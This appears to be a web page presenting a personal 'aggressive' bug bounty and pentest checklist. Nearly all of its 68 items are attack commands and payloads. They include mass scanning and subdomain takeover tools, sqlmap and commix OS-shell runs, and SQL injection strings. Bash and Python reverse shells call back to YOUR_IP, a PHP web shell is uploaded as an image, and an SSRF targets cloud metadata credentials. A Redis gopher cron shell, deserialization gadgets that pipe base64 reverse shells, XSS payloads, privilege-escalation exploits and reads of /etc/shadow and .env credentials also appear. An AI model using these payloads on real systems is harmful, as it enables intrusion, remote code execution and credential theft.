Peniel Logo

Peniel's CyberSec Toolkit

Aggressive Bug Bounty & Pentest Checklist • By @p • Addis Ababa

Total Checks

68

Completed

0

Progress
0%

0 / 68 vulnerabilities checked

  • amass enum -active -brute -d target.com -config ~/.amass/config.ini -o amass-blood.txt
  • subfinder -d target.com -all -es -t 100 -o subdomains-slaughter.txt
  • findomain -t target.com -q -u findomain-massacre.txt
  • assetfinder --subs-only target.com | httpx -silent -threads 200 -o live-corpses.txt
  • chaos -d target.com -key YOUR_KEY -limit 10000 -o chaos-graveyard.txt
  • github-subdomains -d target.com -t GITHUB_TOKEN --json | jq -r .subdomain > github-corpses.txt
  • dnsgen live-corpses.txt | massdns -r resolvers.txt -t 100 -o S massdns-graves.txt
  • brute-force crt.sh + censys + riddler + bufferover + threatcrowd + virustotal + dnsdumpster

  • subjack -w live-corpses.txt -t 100 -o takeover-claimed.txt -ssl -v
  • nuclei -l live-corpses.txt -t ~/nuclei-templates/takeovers/ -severity critical -o takeovers-owned.txt
  • dnstake -d live-corpses.txt -o dnstake-bloodbath.txt
  • tko-subs -domains live-corpses.txt -output tko-massacre.txt
  • dnsrecon -d target.com -D takeover-wordlist.txt -t axfr --ignore-timeout
  • aquatone --threads 200 live-corpses.txt --out takeover-screenshots

  • masscan -p1-65535 target.com --rate=100000 --banners -oG masscan-carnage.txt
  • nmap -iL live-corpses.txt -p- -T4 --min-rate 10000 --max-retries 1 -oA nmap-rape
  • nmap -sV --script vuln,safe,auth,exploit -iL live-corpses.txt -oN nmap-exploit.txt
  • nuclei -l live-corpses.txt -t cves/ -t vulnerabilities/ -severity critical,high -o nuclei-massacre.txt
  • naabu -list live-corpses.txt -rate 50000 -o ports-bloody.txt
  • feroxbuster -u https://target.com -w raft-large-directories.txt -x php,asp,aspx,jsp,js,env,bak,old,git -t 300 -k -o ferox-blood.txt

  • ffuf -u https://target.com/FUZZ -w raft-medium-directories.txt -mc 200,301,302 -t 300 -o ffuf-slaughter.json -ac
  • dirsearch -u https://target.com -w directory-list-2.3-big.txt -e php,js,html,asp,aspx,jsp,env,bak,old,git,svn,zip,tar.gz -t 200 --random-agent
  • gobuster dir -u https://target.com -w common.txt -x php,html,txt,js,bak,env -t 150 -k -o gobuster-kill.txt
  • katana -list live-corpses.txt -d 7 -jc -silent -o katana-carnage.txt
  • arjun -u https://target.com/api/endpoint -m POST -o arjun-params-blood.txt
  • paramspider -d target.com -o params-massacre.txt --level high

  • sqlmap -u https://target.com/page?id=1 --batch --risk=3 --level=5 --tamper=space2comment,randomcase --dbs --dump-all
  • sqlmap -r request.txt --batch --risk=3 --level=5 --os-shell
  • NoSQLMap -u https://target.com/api/mongo --dump
  • Time-based: ' OR IF(1=1,SLEEP(10),0)--
  • Error-based: ' OR ExtractValue(1,concat(0x7e,(SELECT database()),0x7e))--
  • Union-based: ' UNION SELECT 1,2,group_concat(table_name),4 FROM information_schema.tables--

  • commix --url https://target.com/vuln --data='cmd=ping' --os-shell
  • commix -r request.txt --level=3 --os-shell
  • Reverse shell one-liner: bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
  • Python reverse: python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
  • Log poison → LFI → /proc/self/environ → RCE
  • PHP → <?php system($_GET['cmd']); ?> uploaded as .php.jpg

  • gau target.com | gf ssrf | qsreplace 'http://169.254.169.254/latest/meta-data/iam/security-credentials/role'
  • Intruder payloads: http://127.0.0.1, http://localhost, http://[::1], http://0, http://127.1, http://2130706433
  • gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0d%0a*/1 * * * * bash -i >& /dev/tcp/YOUR_IP/4444 0>&1%0d%0a%0d%0a
  • Burp Collaborator + DNS rebinding for blind SSRF

  • ysoserial CommonsCollections6 'bash -c {echo,YOUR_BASE64_REVERSE_SHELL}|{base64,-d}|{bash,-i}' | base64
  • ysoserial URLDNS http://YOUR_COLLABORATOR.oastify.com
  • phpggc Symfony/RCE1 'bash -c {echo,YOUR_BASE64}|{base64,-d}|{bash,-i}' | base64
  • ViewState __VIEWSTATE=... with YSoSerial.net
  • Jackson gadget chains for Java RCE

  • ppmap target.com --dump (prototype pollution scanner)
  • DOMPurify bypass: <img src=x onerror=alert(1)> with custom sanitizer bypass
  • Angular {{constructor.constructor('alert(1)')()}}
  • postMessage * → steal tokens
  • OAuth open redirect → code/token theft
  • XSS via JSONP endpoints / callback=alert(1)

  • linpeas.sh -a -r /tmp/linpeas.txt
  • winpeas.exe /quiet /log winpeas-blood.txt
  • sudo -l | grep -i nopasswd
  • DirtyCow / DirtyPipe / CVE-2022-0847
  • Polkit pkexec PwnKit (CVE-2021-4034)
  • Docker escape via /var/run/docker.sock
  • K8s pod escape → cluster-admin via misconfig RBAC

  • cat /etc/passwd /etc/shadow /etc/group
  • find / -name *.env -o -name config.php -o -name *.yml 2>/dev/null
  • .git/HEAD exposed → download source
  • aws s3 ls s3://company-backups --recursive
  • firebase database dump via open .json endpoints
  • Exposed admin panels: /admin, /wp-admin, /phpmyadmin, /adminer
  • DB creds from .env → mysql -u root -p'pass' -h localhost
  • Juicy files: swagger.json, graphql, sitemap.xml, robots.txt, backup.sql.gz